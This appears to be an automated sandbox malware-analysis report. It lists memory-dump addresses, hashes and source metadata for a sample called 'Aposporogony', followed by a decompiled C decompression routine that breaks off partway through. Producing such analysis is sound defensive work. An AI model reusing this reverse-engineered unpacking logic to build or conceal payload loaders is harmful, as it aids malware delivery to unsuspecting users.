                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407226
                                                                                                                                                                                      0x0040722d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407230
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406fee
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x00407223

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00407128() {
                                                                                                                                                                                      				void _t533;
                                                                                                                                                                                      				signed int _t534;
                                                                                                                                                                                      				signed int _t535;
                                                                                                                                                                                      				signed int* _t605;
                                                                                                                                                                                      				void* _t612;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					if( *(_t612 - 0x40) != 0) {
                                                                                                                                                                                      						 *(_t612 - 0x84) = 0x13;
                                                                                                                                                                                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                                                                                      						goto L132;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      						__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      						L130:
                                                                                                                                                                                      						 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      						 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      						L144:
                                                                                                                                                                                      						 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                      						L145:
                                                                                                                                                                                      						__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      						 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                      						L149:
                                                                                                                                                                                      						if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                      							__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                      							0 = 1;
                                                                                                                                                                                      							__eax = 1 << __cl;
                                                                                                                                                                                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L140:
                                                                                                                                                                                      								 *(_t612 - 0x88) = _t533;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									_t534 =  *(_t612 - 0x88);
                                                                                                                                                                                      									if(_t534 > 0x1c) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
                                                                                                                                                                                      										case 0:
                                                                                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                      											_t534 =  *( *(_t612 - 0x70));
                                                                                                                                                                                      											if(_t534 > 0xe1) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                      											_push(0x2d);
                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                      											_pop(_t569);
                                                                                                                                                                                      											_push(9);
                                                                                                                                                                                      											_pop(_t570);
                                                                                                                                                                                      											_t608 = _t538 / _t569;
                                                                                                                                                                                      											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                      											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                                                                                      											 *(_t612 - 0x3c) = _t603;
                                                                                                                                                                                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                                                                                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                                                                                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                                                                                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                                                                                      												L10:
                                                                                                                                                                                      												if(_t611 == 0) {
                                                                                                                                                                                      													L12:
                                                                                                                                                                                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                                                                                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                                      													goto L15;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L11;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												do {
                                                                                                                                                                                      													L11:
                                                                                                                                                                                      													_t611 = _t611 - 1;
                                                                                                                                                                                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                                                                                      												} while (_t611 != 0);
                                                                                                                                                                                      												goto L12;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *(_t612 - 4) != 0) {
                                                                                                                                                                                      												GlobalFree( *(_t612 - 4));
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      											 *(_t612 - 4) = _t534;
                                                                                                                                                                                      											if(_t534 == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                                                                                      												goto L10;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 1:
                                                                                                                                                                                      											L13:
                                                                                                                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                      												 *(_t612 - 0x88) = 1;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                      											_t45 = _t612 - 0x48;
                                                                                                                                                                                      											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                                                                                      											__eflags =  *_t45;
                                                                                                                                                                                      											L15:
                                                                                                                                                                                      											if( *(_t612 - 0x48) < 4) {
                                                                                                                                                                                      												goto L13;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t546 =  *(_t612 - 0x40);
                                                                                                                                                                                      											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                                                                                      												L20:
                                                                                                                                                                                      												 *(_t612 - 0x48) = 5;
                                                                                                                                                                                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      												goto L23;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t612 - 0x74) = _t546;
                                                                                                                                                                                      											if( *(_t612 - 8) != 0) {
                                                                                                                                                                                      												GlobalFree( *(_t612 - 8));
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                                                                                      											 *(_t612 - 8) = _t534;
                                                                                                                                                                                      											if(_t534 == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L20;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 2:
                                                                                                                                                                                      											L24:
                                                                                                                                                                                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                                                                                      											 *(_t612 - 0x84) = 6;
                                                                                                                                                                                      											 *(_t612 - 0x4c) = _t553;
                                                                                                                                                                                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 3:
                                                                                                                                                                                      											L21:
                                                                                                                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                      												 *(_t612 - 0x88) = 3;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                      											_t67 = _t612 - 0x70;
                                                                                                                                                                                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                      											__eflags =  *_t67;
                                                                                                                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L23:
                                                                                                                                                                                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                                                                                      											if( *(_t612 - 0x48) != 0) {
                                                                                                                                                                                      												goto L21;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L24;
                                                                                                                                                                                      										case 4:
                                                                                                                                                                                      											L133:
                                                                                                                                                                                      											_t531 =  *_t605;
                                                                                                                                                                                      											_t588 = _t531 & 0x0000ffff;
                                                                                                                                                                                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                                                                                      											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                                                                                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                                                                                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                                                                                      												 *(_t612 - 0x40) = 1;
                                                                                                                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                      												__eflags = _t532;
                                                                                                                                                                                      												 *_t605 = _t532;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(_t612 - 0x10) = _t564;
                                                                                                                                                                                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L139;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L137;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 5:
                                                                                                                                                                                      											L137:
                                                                                                                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                      												 *(_t612 - 0x88) = 5;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L139:
                                                                                                                                                                                      											_t533 =  *(_t612 - 0x84);
                                                                                                                                                                                      											goto L140;
                                                                                                                                                                                      										case 6:
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												goto L132;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      											__cl = 8;
                                                                                                                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      													_t98 = __ebp - 0x38;
                                                                                                                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      													__eflags =  *_t98;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												__ebx = 1;
                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 8);
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												__ebx = 1;
                                                                                                                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 7:
